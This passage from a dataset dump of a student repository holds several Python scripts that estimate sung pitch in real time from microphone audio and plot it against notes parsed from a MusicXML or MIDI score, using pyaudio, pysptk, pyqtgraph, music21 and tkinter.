print(self.unprocessed_sound.empty())\n # self.cnt = 0\n #print('Data length: ', len(data))\n data = data.astype('float64')\n #print(len(data))\n t0 = time.perf_counter()\n sw = swipe(data,self.RATE,int(self.CHUNK/5),min=30,max=1200,threshold=0.25)\n print('swipe time: ', time.perf_counter()-t0)\n self.swipes_toplot.put(sw)\n #print('swipe length: ', len(sw))\n else:\n break\n return True\n\n def setup_plot(self):\n self.mainLayout = QtWidgets.QVBoxLayout()\n self.setLayout(self.mainLayout)\n\n self.timer = QtCore.QTimer(self)\n self.timer.setInterval(20) # in milliseconds\n self.timer.start()\n self.timer.timeout.connect(self.update_plot)\n\n self.plotSwipe = self.addPlot(title=\"Swipe pitch estimates\")\n # self.plotSwipe.setLogMode(x=False,y=True)\n # self.plotSwipe.setXRange(-10, 0, padding=0)\n min_freq = np.log(80)/np.log(2**(1/12))\n max_freq = np.log(800)/np.log(2**(1/12))\n # min_freq = 80\n # max_freq = 500\n self.plotSwipe.setYRange(min_freq,max_freq, padding=0)\n self.plotSwipe.showGrid(True,True,1)\n\n # to fix grid, the same for x axis\n ay = self.plotSwipe.getAxis('left')\n # np.exp(np.log(2**(1/12)*(value+0.5)))\n dy = [(value+0.5, str(value+0.5)) for value in range(int(min_freq),int(max_freq))]\n ay.setTicks([dy, []])\n\n ax = self.plotSwipe.getAxis('bottom')\n dx = [(value, str(value)) for value in np.arange(-10,0,0.75)]\n ax.setTicks([dx, []])\n # time_\n\n # self.plotSwipe.enableAutoScale()\n\n self.plot_swipe_item = self.plotSwipe.plot([], pen=None,\n symbolBrush=(255,0,0), symbolSize=5, symbolPen=None)\n # self.plot_swipe_item.setLogMode(False,True)\n # self.plot_swipe_item.setXRange(-10, 0, padding=0)\n # self.plot_swipe_item.setYRange(1, 3, padding=0)\n # self.plot_swipe_item.setLogMode(x=None,y=True)\n\n def audio_callback(self, in_data, frame_count, time_info, status):\n\n #print(time.time())\n #print('in callback')\n data = np.frombuffer(in_data,dtype=np.int16)\n #print(type(data.astype('float64')))\n self.unprocessed_sound.put(data)\n\n return(in_data,pyaudio.paContinue)\n\n def myExitHandler(self):\n #print('in exit')\n self.p.close(self.stream)\n self.shut_down_queue.put(True)\n self.proc.join()\n\n\n def update_plot(self):\n try:\n data = self.swipes_toplot.get_nowait()\n except queue.Empty:\n pass\n #print('no swipes')\n else:\n self.pitch = np.roll(self.pitch,-len(data))\n np.put(self.pitch,range(-len(data),-1),data)\n t0 = time.perf_counter()\n self.plot_swipe_item.setData(self.tp,np.log(self.pitch)/np.log(2**(1/12)))\n #print('plot time: ', time.perf_counter()-t0)\n\n\n\ndef main():\n app = QtWidgets.QApplication([])\n\n pg.setConfigOptions(antialias=False) # True seems to work as well\n\n win = MyWidget()\n app.aboutToQuit.connect(win.myExitHandler)\n win.show()\n win.raise_()\n app.exec_()\n\nif __name__ == \"__main__\":\n main()\n" }, { "alpha_fraction": 0.5280411839485168, "alphanum_fraction": 0.5694933533668518, "avg_line_length": 25.177305221557617, "blob_id": "37430f111c49e39d28bd4b7d245063f014f10671", "content_id": "2febb42ab974ac767c9108b8143d935740d7f5bc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3691, "license_type": "no_license", "max_line_length": 83, "num_lines": 141, "path": "/python/testpy/test2.py", "repo_name": "yxc0103de/spektralmagi", "src_encoding": "UTF-8", "text": "import matplotlib.pyplot as plt\nimport pyaudio\nimport struct\nimport numpy as np\nimport pysptk.sptk as sptk\nimport time\nimport pyqtgraph as pg\n\n\nFORMAT = pyaudio.paInt16\nCHANNELS = 1\nRATE = 
44100\nloop = 0.2\nCHUNK = int(loop * RATE) # 13000 #int(wlen*RATE)\nwlen = float(CHUNK / RATE)\n\np = pyaudio.PyAudio()\n\nchosen_device_index = -1\nfor x in range(0, p.get_device_count()):\n info = p.get_device_info_by_index(x)\n # print p.get_device_info_by_index(x)\n if info[\"name\"] == \"pulse\":\n chosen_device_index = info[\"index\"]\n print(\"Chosen index: \", chosen_device_index)\n\nstream = p.open(format=FORMAT,\n channels=CHANNELS,\n rate=RATE,\n input_device_index=chosen_device_index,\n input=True,\n output=True,\n frames_per_buffer=CHUNK\n )\n\n\n#data = stream.read(CHUNK)\n# data_int16 = struct.unpack(str(CHUNK) + 'h', data)\n\n# draw the figure so the animations will work\nfig = plt.gcf()\nfig.show()\nfig.canvas.draw()\n\nt = np.linspace(-10, 0, num=10 * RATE)\nsound = np.zeros(10 * RATE)\ndt = int(loop / 10 * RATE)\npitch = np.zeros(int(10 / dt * RATE))\ntp = np.linspace(-10, 0, num=len(pitch))\n\nt0 = time.process_time()\nwhile True:\n # compute something\n print('loop', time.process_time() - t0)\n t0 = time.process_time()\n data = np.array(struct.unpack(str(CHUNK) + 'h',\n stream.read(CHUNK, exception_on_overflow=False)))\n t55 = time.process_time()\n print('get rec ', t55 - t0)\n data = data.astype('float64')\n sound = np.roll(sound, -len(data))\n t59 = time.process_time()\n print('roll sound ', t59 - t55)\n\n sw = sptk.swipe(data, RATE, dt, min=40, max=700, threshold=0.25)\n t63 = time.process_time()\n print('swipe', t63 - t59)\n # print(len(sw))\n # t2 = time.process_time()\n # print('Swipe time ',t2-t1)\n\n pitch = np.roll(pitch, -len(sw))\n t70 = time.process_time()\n print('roll pitch ', t70 - t63)\n # print('length from swipe ',len(sw))\n # print('length of pitch ', len(pitch))\n\n # print('Pitch len ',len(pitch))\n # print('sw len ', len(sw))\n # print('pitch time ',dt*len(pitch)/RATE)\n\n # print(pitch)\n\n np.put(sound, range(-len(data), -1), data)\n t84 = time.process_time()\n print('put sound ', t84 - t70)\n np.put(pitch, range(-len(sw), -1), sw)\n t87 = time.process_time()\n print('put pitch ', t87 - t84)\n # t10 = time.process_time()\n # print('75',t10-t2)\n plt.figure(1)\n plt.clf()\n # t3 = time.process_time()\n # # print('78',t3-t10)\n plt.plot(t, sound) # plot something\n\n #\n # plt.pause(0.001) # I ain't needed!!!\n # fig.canvas.draw()\n #\n plt.figure(2)\n plt.clf()\n t103 = time.process_time()\n print('clf ', t103 - t87)\n plt.plot(tp, pitch, '.') # plot something\n\n t4 = time.process_time()\n print('plot', t4 - t103)\n # print('Before pause ',t4-t0)\n # pg.plot(tp, pitch, pen=None, symbol='o')\n # t5 = time.process_time()\n # print('Pause',t5-t4)\n fig.canvas.draw()\n t1 = time.process_time()\n print('canvas draw', t1 - t4)\n twait = loop - (t1 - t0)\n print('twait ', twait)\n if twait > 0.0:\n plt.pause(twait) # I ain't needed!!!\n # time.sleep(twait)\n # time.sleep(0.1)\n else:\n plt.pause(0.001)\n # time.sleep(1)\n # print('wtf')\n print(time.process_time() - t1)\n\n # print(time.process_time()-t5)\n\n # plt.figure(2)\n # plt.clf()\n # plt.plot(tp,pitch,'.')\n # plt.pause(0.005) # I ain't needed!!!\n # fig.canvas.draw()\n\n # update canvas immediately\n #plt.xlim([0, 100])\n #plt.ylim([0, 1000])\n\n # print(data)\n" }, { "alpha_fraction": 0.587395966053009, "alphanum_fraction": 0.6111771464347839, "avg_line_length": 24.484848022460938, "blob_id": "1d8b77f23ef29496c5bc84d78ece46e827a6209d", "content_id": "b171a65596658e245d4e1262622b982566c82459", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", 
"length_bytes": 841, "license_type": "no_license", "max_line_length": 63, "num_lines": 33, "path": "/erik/testmusicxml.py", "repo_name": "yxc0103de/spektralmagi", "src_encoding": "UTF-8", "text": "from music21 import *\nimport numpy as np\n\ndef musicxml2notes(file):\n notes = []\n t = 0\n for element in file.flat.notesAndRests:\n tStart = t\n t+=element.seconds\n tEnd = t\n if element.isNote:\n notes.append((tStart, tEnd, element.pitch.freq440))\n return notes\n\npiece = converter.parse(\"Vem_kan_segla.musicxml\")\nnotes = musicxml2notes(piece)\n\n# for note in notes:\n# print(note)\n\ndef notesTimeMap(times,notes):\n timeNotes = np.zeros(len(times))\n curTime = 0\n for note in notes:\n while curTime < len(times) and time[curTime] < note[0]:\n curTime += 1\n while curTime < len(times) and time[curTime] < note[1]:\n timeNotes[curTime] = note[2]\n curTime += 1\n return timeNotes\n\ntime = np.linspace(-1,32,100)\nn = notesTimeMap(time,notes)\n" }, { "alpha_fraction": 0.57819002866745, "alphanum_fraction": 0.595180332660675, "avg_line_length": 30.51912498474121, "blob_id": "08c12b8642ea583095a4b1b5ba94996f5e6c3812", "content_id": "44de1c9bcf9ef507230f59819940cc7d7cd675c5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5768, "license_type": "no_license", "max_line_length": 115, "num_lines": 183, "path": "/erik/pitchrt3.py", "repo_name": "yxc0103de/spektralmagi", "src_encoding": "UTF-8", "text": "from PyQt5 import QtCore, QtWidgets\nimport pyqtgraph as pg\nimport numpy as np\n\nimport struct\nimport pyaudio\nimport sys\nimport time\n\nfrom pysptk.sptk import swipe\nfrom music21 import *\n\npg.setConfigOption('background', 'k')\n\ndef musicxml2notes(file):\n notes = []\n t = 0\n for element in file.flat.notesAndRests:\n tStart = t\n t+=element.seconds\n tEnd = t\n if element.isNote:\n notes.append((tStart, tEnd, element.pitch.freq440))\n return notes\n\npiece = converter.parse(\"Vem_kan_segla.musicxml\")\nnotes = musicxml2notes(piece)\n\ndef notesTimeMap(times,notes):\n timeNotes = np.zeros(len(times))\n curTime = 0\n for note in notes:\n while curTime < len(times) and times[curTime] < note[0]:\n curTime += 1\n while curTime < len(times) and times[curTime] < note[1]:\n timeNotes[curTime] = note[2]\n curTime += 1\n return timeNotes\n\ndef getPieceLength(xml):\n t = 0;\n for e in xml.flat.notesAndRests:\n t += e.seconds\n return t\n\nclass MyWidget(pg.GraphicsWindow):\n\n def __init__(self, xml, parent=None):\n super().__init__(parent=parent)\n\n\n self.xml = xml # xml file\n self.notes = musicxml2notes(xml)\n self.curNote = 0\n self.displayedNotes = []\n\n self.notesf = []\n self.tn = []\n self.threshold = 1.03\n\n self.simTime = 0 # current time in simulation\n self.endTime = getPieceLength(self.xml)\n self.displayBefore = 5 # seconds displayed ahead of time\n self.displayAfter = 5 # seconds of displayed history\n\n self.loop = 0.2 # time between updates of plot in sec, not faster than 0.15-0.2\n self.pitchBatch = 10 # number of pitches to look for in each loop\n\n self.setupAudio()\n self.setup_plot()\n\n self.sound = np.zeros(self.displayAfter*self.SAMPLERATE) # vector to store sound\n self.ts = np.linspace(0,self.endTime,len(self.sound))\n\n self.pitches = np.zeros(int(self.displayAfter*self.pitchBatch/self.loop)) # vector to store pitch estimates\n self.tp = np.linspace(0,self.endTime,len(self.pitches))\n\n self.dt = int(self.loop/self.displayAfter*self.SAMPLERATE)\n\n self.startTimer()\n\n \n\n def startTimer(self):\n self.timer = 
QtCore.QTimer(self)\n self.timer.setInterval(self.loop*1000) # in milliseconds\n self.timer.start()\n self.timer.timeout.connect(self.timerEvent)\n\n def setupAudio(self):\n FORMAT = pyaudio.paInt16\n CHANNELS = 1\n self.SAMPLERATE = 48000 # TODO: find input sampling frequency\n self.CHUNK = int(self.loop*self.SAMPLERATE)\n\n p = pyaudio.PyAudio()\n self.stream = p.open(\n format = FORMAT,\n channels = CHANNELS,\n rate = self.SAMPLERATE,\n input = True,\n output = True,\n #stream_callback=self.audio_callback,\n frames_per_buffer=self.CHUNK\n )\n\n def setup_plot(self):\n self.mainLayout = QtWidgets.QVBoxLayout()\n self.setLayout(self.mainLayout)\n\n self.plotSwipe = self.addPlot(title=\"Swipe pitch estimates\", row=1, col=0)\n self.plotSound = self.addPlot(title=\"Sound\", row=0, col=0)\n #self.plotSwipe.setLogMode(False,True)\n #self.plotSwipe.enableAutoScale()\n\n self.plotPitches = self.plotSwipe.plot([], pen=None,\n symbolBrush=(255,0,0), symbolSize=5, symbolPen=None)\n self.plotNotes = self.plotSwipe.plot([], pen=None,\n symbolBrush=(0,0,255), symbolSize=2, symbolPen=None, connect='pairs')\n self.plotSound = self.plotSound.plot()\n\n def timerEvent(self):\n if self.simTime > self.endTime:\n self.timer.stop()\n self.simTime += self.loop\n self.updateSound()\n self.updateNotes()\n self.addNotes()\n self.draw()\n\n def updateSound(self):\n data = np.frombuffer(self.stream.read(self.CHUNK,exception_on_overflow=False), dtype=np.int16)\n data = data.astype('float64')\n\n self.sound = np.roll(self.sound,-len(data))\n np.put(self.sound,range(-len(data),-1),data)\n self.ts += self.loop\n\n sw = swipe(data,self.SAMPLERATE,self.dt,min=40,max=700,threshold=0.25)\n self.pitches = np.roll(self.pitches,-len(sw))\n np.put(self.pitches,range(-len(sw),-1),sw)\n self.tp += self.loop\n\n def updateNotes(self):\n while self.curNote < len(self.notes) and self.notes[self.curNote][1] < self.simTime:\n self.displayedNotes.append(self.notes[self.curNote])\n self.curNote += 1\n if len(self.displayedNotes) > 0 and self.displayedNotes[0][2] < self.simTime - self.displayBefore:\n del(self.displayedNotes[0])\n del(self.tn[0:7])\n del(self.notesf[0:7])\n\n def draw(self):\n self.plotPitches.setData(self.tp, self.pitches)\n self.plotSound.setData( self.ts, self.sound)\n self.plotNotes.setData( self.tn, self.notesf)\n\n def addNotes(self):\n for note in self.displayedNotes:\n t = [note[0], note[1]]\n t = [val for val in t for _ in (0, 1)]\n t = np.roll(t,1)\n f = [note[2]/self.threshold, note[2]*self.threshold]\n f = [val for val in t for _ in (0, 1)]\n f = np.roll(f,1)\n\n if len(self.displayedNotes) > 0:\n self.tn.append(t)\n self.notesf.append(f)\n\n\ndef main():\n app = QtWidgets.QApplication([])\n\n pg.setConfigOptions(antialias=True) # True seems to work as well\n\n win = MyWidget(piece)\n win.show()\n win.raise_()\n app.exec_()\n\nif __name__ == \"__main__\":\n main()\n" }, { "alpha_fraction": 0.5805515050888062, "alphanum_fraction": 0.6034107208251953, "avg_line_length": 23.389381408691406, "blob_id": "923212906b812b8e882842d05020fb2a132e77b2", "content_id": "6a7a55ec7f1f4fe203321f4fe33d0901db49bd42", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2756, "license_type": "no_license", "max_line_length": 76, "num_lines": 113, "path": "/python/testpy/audiomp.py", "repo_name": "yxc0103de/spektralmagi", "src_encoding": "UTF-8", "text": "import multiprocessing as mp\nimport pyaudio\nimport numpy as np\nimport time\nfrom pysptk.sptk import swipe\nimport 
queue\nimport pyqtgraph as pg\nfrom PyQt5 import QtCore, QtWidgets\n\nCHANNELS = 1\nRATE = 44100\nCHUNK = 6000#2*2048\nFORMAT = pyaudio.paInt16\ncnt = 0\ntsave = 10\n\nunprocessed_sound = mp.Queue()\nswipes_toplot = mp.Queue()\npitch = np.zeros(int(tsave*5*RATE/CHUNK))\ntp = np.linspace(-tsave,0,num=len(pitch))\n\n# app = QtWidgets.QApplication([])\nwid = pg.GraphicsWindow()\nwid.show()\nwid.raise_()\nmainLayout = QtWidgets.QVBoxLayout()\nwid.setLayout(mainLayout)\n# app.exec_()\nplot_swipe = wid.addPlot(title='Swipe mp')\nplot_swipe_item = plot_swipe.plot([], pen=None,\n symbolBrush=(255,0,0), symbolSize=5, symbolPen=None)\n\n\ndef audio_callback(in_data, frame_count, time_info, status):\n print('in callback')\n data = np.frombuffer(in_data,dtype=np.int16)\n unprocessed_sound.put(data)\n\n return(in_data,pyaudio.paContinue)\n\ndef do_job():\n # global unprocessed_sound\n global cnt,pitch,tp\n print('in do_job')\n while True:\n try:\n data = unprocessed_sound.get_nowait()\n except queue.Empty:\n print('swipe empty')\n cnt += 1\n print('queue empty, cnt: ', cnt)\n if cnt > 3:\n break\n time.sleep(0.1)\n else:\n cnt = 0\n print('Data length: ', len(data))\n data = data.astype('float64')\n t0 = time.perf_counter()\n sw = swipe(data,RATE,int(CHUNK/5),min=30,max=800,threshold=0.25)\n print('swipe time: ', time.perf_counter()-t0)\n swipes_toplot.put(sw)\n print('swipe length: ', len(sw))\n return True\n\ndef setup_pyqt():\n app = QtWidgets.QApplication([])\n pg.setConfigOptions(antialias=False)\n mainLayout = QtWidgets.QVBoxLayout()\n setLayout(mainLayout)\n\ndef update_plot():\n try:\n data = swipes_toplot.get_nowait()\n except queue.Empty:\n print('no swipes')\n else:\n pitch = np.roll(pitch,-len(data))\n np.put(pitch,range(-len(data),-1),data)\n plot_swipe_item.setData(tp,pitch)\n\ndef main():\n\n p = pyaudio.PyAudio()\n stream = p.open(\n rate=RATE,\n channels=CHANNELS,\n format=FORMAT,\n input=True,\n stream_callback=audio_callback,\n frames_per_buffer=CHUNK\n )\n time.sleep(1)\n timer = QtCore.QTimer(wid)\n timer.setInterval(50) # in milliseconds\n timer.start()\n timer.timeout.connect(update_plot)\n\n proc = mp.Process(target=do_job)\n proc.start()\n # time.sleep(5)\n x = 0\n while x <1000:\n print(x)\n x += 1\n time.sleep(0.02)\n p.close(stream)\n proc.join()\n\n print('done??')\n\nif __name__ == '__main__':\n main()\n" }, { "alpha_fraction": 0.5858112573623657, "alphanum_fraction": 0.6146101355552673, "avg_line_length": 26.21019172668457, "blob_id": "fcebce3533b6bc36454703b652d0f9694add4159", "content_id": "c49b2dd96cdb8efe468a221dd57bf4bc2b57da7a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4271, "license_type": "no_license", "max_line_length": 138, "num_lines": 157, "path": "/erik/test3.py", "repo_name": "yxc0103de/spektralmagi", "src_encoding": "UTF-8", "text": "from music21 import *\nfrom tkinter import *\nfrom tkinter import filedialog\nimport threading\nimport math\nfrom datetime import datetime\n\n\n#path = filedialog.askopenfilename()\npath = \"Vem_kan_segla.musicxml\"\npiece = converter.parse(\"Vem_kan_segla.musicxml\")\n\n\n\n\nupcoming = []\n\nt = 0\nmidimax = 0\nmidimin = 9999\nfor e in piece.flat.notesAndRests:\n if e.isNote:\n #print(e.pitch.midi)\n midimax = max(midimax,e.pitch.midi)\n midimin = min(midimin,e.pitch.midi)\n setattr(e,\"time\",t)\n setattr(e,\"passed\",0)\n setattr(e,\"hits\",0)\n setattr(e,\"misses\",0)\n t += e.seconds\n upcoming.append(e)\n\nmidirange = midimax-midimin+1\n\ncTime = 0\ndTime = 
12\n\nclass Pitch():\n def __init__(self, time, freq):\n self.time = time\n self.freq = freq\n\nclass RollCanvas(Canvas):\n def __init__(self,midimin,midimax,tempo,timeSig,dTime=10, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.midimin = midimin\n self.midimax = midimax\n self.midirange = midimax-midimin+1\n self.freqmin = self.midi2freq(midimin)/(2**(1/24))\n self.freqmax = self.midi2freq(midimax)*(2**(1/24))\n self.freqrange = self.freqmax-self.freqmin\n self.dTime = dTime\n self.tempo = tempo/60 # bps instead of bpm\n self.timeSig = timeSig\n\n def w(self):\n return self.winfo_width()\n\n def h(self):\n return self.winfo_height()\n\n def time2px(self,time, cTime):\n return (time-cTime)/self.dTime*self.w() + self.w()/2\n\n def midi2px(self,midi):\n return self.h()-(midi-self.midimin)*self.h()/self.midirange\n\n def freq2px(self,freq):\n pass\n\n def midi2freq(self,midi):\n a = 440 #frequency of A (coomon value is 440Hz)\n return (a / 32) * (2 ** ((midi - 9) / 12))\n\n def drawLines(self, cTime):\n # Note lines\n for i in range(1,self.midirange):\n y = self.h()/self.midirange*i\n self.create_line(0,y,self.w(),y,fill=\"#444444\")\n # Bar Lines\n nBars = math.ceil(self.dTime*self.tempo/self.timeSig)\n for i in range(-math.ceil(nBars/2),math.ceil(nBars/2)):\n for j in range(self.timeSig):\n x = (i*self.timeSig+j)*self.w()/(self.dTime*self.tempo)+self.w()/2-self.w()*(cTime%(self.timeSig/(self.tempo)))/self.dTime\n if j%self.timeSig==0:\n self.create_line(x,0,x,self.h(),fill=\"#555555\")\n else:\n self.create_line(x,0,x,self.h(),fill=\"#444444\",dash=(4,4))\n x = i/self.dTime*self.h()+(cTime%(self.tempo*self.timeSig))*self.h()\n \n # Now-line\n self.create_line(self.w()/2,0,self.w()/2,self.h(),fill=\"white\")\n\n def drawNote(self,note,cTime):\n x0 = self.time2px(note.time,cTime)\n x1 = self.time2px(note.time+note.seconds,cTime)\n y0 = self.midi2px(note.pitch.midi)\n y1 = y0 - self.h()/self.midirange\n if note.time < cTime:\n color = \"red\"\n else:\n color = \"grey\"\n self.create_rectangle(x0, y0, x1, y1, fill=color)\n\n def drawPitch(self,pitch):\n w = self.winfo_width()\n h = self.winfo_height()\n\n\nmaster = Tk()\nmaster.title(\"StarSingers\")\n\nwRef = 100\nwCan = 900\nhNotes = 250\nhRoll = 350\n\nnotesFrame = Frame(master)\nnotesFrame.pack()\n\nrollFrame = Frame(master)\nrollFrame.pack()\n\nnotesReference = Canvas(notesFrame, width=wRef,height=hNotes)\nnotesReference.grid(row=0,column=0)\n\nnotesCanvas = Canvas(notesFrame, width=wCan,height=hNotes)\nnotesCanvas.grid(row=0,column=1)\n\nrollReference = Canvas(rollFrame, width=wRef,height=hRoll,bg=\"black\")\nrollReference.grid(row=0,column=0)\n\nrollCanvas = RollCanvas(midimin,midimax,90,3,10,rollFrame, width=wCan,height=hRoll,bg=\"black\")\nrollCanvas.grid(row=0,column=1)\n\nmaster.update()\n\n\ndef drawUpcoming():\n for e in upcoming:\n if e.isNote:\n rollCanvas.drawNote(e,cTime)\n\nlooplen = 20; # length of loop in milliseconds\n\ndef loop():\n global cTime\n millis1 = datetime.now().microsecond\n cTime += looplen/1000\n rollCanvas.delete(\"all\")\n rollCanvas.drawLines(cTime)\n drawUpcoming()\n millis2 = datetime.now().microsecond\n master.after(looplen,loop)\n\nmaster.after(looplen,loop)\nmaster.mainloop()" }, { "alpha_fraction": 0.5944055914878845, "alphanum_fraction": 0.5979021191596985, "avg_line_length": 18, "blob_id": "d7d78a458d776eaa3244dd137731829ffbf93245", "content_id": "b18551a6a5c6c89039c4d62c8cb2b27e331cda79", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", 
"length_bytes": 286, "license_type": "no_license", "max_line_length": 70, "num_lines": 15, "path": "/filip/testpy/miditest.py", "repo_name": "yxc0103de/spektralmagi", "src_encoding": "UTF-8", "text": "from mido import MidiFile\nimport pyqtgraph as pg\n\n\nmidi = MidiFile(\"Vem_kan_segla.mid\")\n\nfor msg in midi:\n print(msg)\n\nnotes = []\ntimes = []\n\nfor msg in midi:\n if msg.type == \"note_on\" & msg.velocity == 0:\n print(\"Length: \" + str(msg.time) + \", Note: \" + str(msg.note))\n\n" }, { "alpha_fraction": 0.5911566019058228, "alphanum_fraction": 0.6150799989700317, "avg_line_length": 32.48618698120117, "blob_id": "b04b9ae843a64b799ae8647e8f31cd8617ffce6c", "content_id": "ae5ea961f6564ca76761f7c18a8a672e3bb36080", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6061, "license_type": "no_license", "max_line_length": 123, "num_lines": 181, "path": "/erik/pitchrt.py", "repo_name": "yxc0103de/spektralmagi", "src_encoding": "UTF-8", "text": "from PyQt5 import QtCore, QtWidgets\nimport pyqtgraph as pg\nimport numpy as np\nimport math\nimport inspect\n\n\nimport struct\nimport pyaudio\nimport sys\nimport time\n\nfrom pysptk.sptk import swipe\nfrom music21 import *\n\npg.setConfigOption('background', 'k')\n\ndef musicxml2notes(file):\n notes = []\n t = 0\n for element in file.flat.notesAndRests:\n tStart = t\n t+=element.seconds\n tEnd = t\n if element.isNote:\n notes.append((tStart, tEnd, element.pitch.freq440))\n return notes\n\npiece = converter.parse(\"Vem_kan_segla.musicxml\")\nnotes = musicxml2notes(piece)\n\ndef notesTimeMap(times,notes):\n timeNotes = np.zeros(len(times))\n curTime = 0\n for note in notes:\n while curTime < len(times) and times[curTime] < note[0]:\n curTime += 1\n while curTime < len(times) and times[curTime] < note[1]:\n timeNotes[curTime] = note[2]\n curTime += 1\n return timeNotes\n\n\nclass MyWidget(pg.GraphicsWindow):\n\n def __init__(self, parent=None):\n super().__init__(parent=parent)\n self.simtime = 0\n\n self.loop = 0.2 # time between updates of plot in sec, not faster than 0.15-0.2\n nbr_pitch = 10 # number of pitches to look for in each loop\n nbr_sec = 10 # number of seconds to display\n\n self.setup_pyaudio(self.loop)\n self.setup_datavar(nbr_pitch, nbr_sec, self.loop)\n self.setup_plot(self.loop)\n\n def setup_pyaudio(self,loop):\n FORMAT = pyaudio.paInt16\n CHANNELS = 1\n self.RATE = 44100\n self.CHUNK = int(loop*self.RATE)\n\n p = pyaudio.PyAudio()\n self.stream = p.open(\n format = FORMAT,\n channels = CHANNELS,\n rate = self.RATE,\n input = True,\n output = True,\n #stream_callback=self.audio_callback,\n frames_per_buffer=self.CHUNK\n )\n\n def setup_datavar(self,nbr_pitch,nbr_sec,loop):\n self.t = np.linspace(-nbr_sec,0,num=nbr_sec*self.RATE)\n self.sound = np.zeros(10*self.RATE)\n self.dt = int(loop/nbr_sec*self.RATE)\n self.pitch = np.zeros(int(nbr_pitch/self.dt*self.RATE))\n self.tp = np.linspace(-nbr_sec,0,num=len(self.pitch))\n\n def setup_datavar2(self,nbr_pitch,nbr_sec,loop):\n self.t = np.linspace(-1,notes[-1,2],num=notes[-1,2]+1*self.RATE)\n self.sound = np.zeros(10*self.RATE)\n self.dt = int(loop/nbr_sec*self.RATE)\n self.pitch = np.zeros(int(nbr_pitch/self.dt*self.RATE))\n self.tp = np.linspace(-1,notes[-1,2],num=len(self.pitch))\n\n def setup_plot(self,loop):\n self.mainLayout = QtWidgets.QVBoxLayout()\n self.setLayout(self.mainLayout)\n\n\n self.timer = QtCore.QTimer(self)\n self.timer.setInterval(loop*1000) # in milliseconds\n self.timer.start()\n 
self.timer.timeout.connect(self.onNewData2)\n\n self.plotSwipe = self.addPlot(title=\"Swipe pitch estimates\", row=1, col=0)\n self.plotSound = self.addPlot(title=\"Sound\", row=0, col=0)\n #self.plotSwipe.setLogMode(False,True)\n #self.plotSwipe.enableAutoScale()\n\n r2 = pg.QtGui.QGraphicsRectItem(0, -5, 3, 10)\n r2.setPen(pg.mkPen((0, 0, 0, 100)))\n r2.setBrush(pg.mkBrush((50, 50, 200)))\n self.plotSwipe.addItem(r2)\n\n self.plotPitches = self.plotSwipe.plot([], pen=None,\n symbolBrush=(255,0,0), symbolSize=5, symbolPen=None)\n self.plotNotesUpper = self.plotSwipe.plot([], pen=None,\n symbolBrush=(0,0,255), symbolSize=2, symbolPen=None)\n self.plotNotesLower = self.plotSwipe.plot([], pen=None,\n symbolBrush=(0,0,255), symbolSize=2, symbolPen=None)\n self.plotSound = self.plotSound.plot()\n\n\n\n # def audio_callback(self, in_data, frame_count, time_info, status):\n # audio_data = np.frombuffer(in_data, dtype=np.int16)\n # audio_data = audio_data.astype('float16')\n # self.sound = np.roll(self.sound,-len(audio_data))\n # np.put(self.sound,range(-len(audio_data),-1),audio_data)\n\n # return(in_data,pyaudio.paContinue)\n\n\n def onNewData2(self):\n noteTimes = notesTimeMap(self.tp+self.simtime,notes)\n self.simtime += self.loop\n self.plotNotesLower.setData(self.tp+5, [math.log(max(1,y)) for y in noteTimes/1.03])\n self.plotNotesUpper.setData(self.tp+5, [math.log(max(1,y)) for y in noteTimes*1.03])\n \n\n data = np.frombuffer(self.stream.read(self.CHUNK,exception_on_overflow=False), dtype=np.int16)\n data = data.astype('float64')\n\n self.sound = np.roll(self.sound,-len(data))\n np.put(self.sound,range(-len(data),-1),data)\n\n sw = swipe(data,self.RATE,self.dt,min=40,max=700,threshold=0.25)\n self.pitch = np.roll(self.pitch,-len(sw))\n np.put(self.pitch,range(-len(sw),-1),sw)\n \n self.plotPitches.setData(self.tp, [math.log(max(1,y)) for y in self.pitch])\n self.plotSound.setData(self.t, self.sound)\n\n \n\n def onNewData(self):\n # data = np.array(struct.unpack(str(self.CHUNK) + 'h', self.stream.read(self.CHUNK,exception_on_overflow = False)))\n data = np.frombuffer(self.stream.read(self.CHUNK,exception_on_overflow=False), dtype=np.int16)\n data = data.astype('float64')\n\n self.sound = np.roll(self.sound,-len(data))\n np.put(self.sound,range(-len(data),-1),data)\n\n sw = swipe(data,self.RATE,self.dt,min=40,max=700,threshold=0.25)\n self.pitch = np.roll(self.pitch,-len(sw))\n np.put(self.pitch,range(-len(sw),-1),sw)\n\n \n self.plotPitches.setData(self.tp, self.pitch)\n self.plotSound.setData(self.t, self.sound)\n\n\n\ndef main():\n app = QtWidgets.QApplication([])\n\n pg.setConfigOptions(antialias=True) # True seems to work as well\n\n win = MyWidget()\n for method in [method_name for method_name in dir(win) if callable(getattr(win, method_name))]:\n print(method)\n win.show()\n win.raise_()\n app.exec_()\n\nif __name__ == \"__main__\":\n main()\n" }, { "alpha_fraction": 0.5518072247505188, "alphanum_fraction": 0.5730923414230347, "avg_line_length": 31.763158798217773, "blob_id": "09c0bf07bbeaeff7c45df1a28924cc9a88e560b2", "content_id": "d419134f379d51d0d06db119de9a163c114acc05", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7470, "license_type": "no_license", "max_line_length": 92, "num_lines": 228, "path": "/erik/test4.py", "repo_name": "yxc0103de/spektralmagi", "src_encoding": "UTF-8", "text": "# plotting\nfrom PyQt5 import QtCore, QtWidgets\nimport pyqtgraph as pg\nfrom music21 import *\n\nimport pyaudio\nimport sys\nimport 
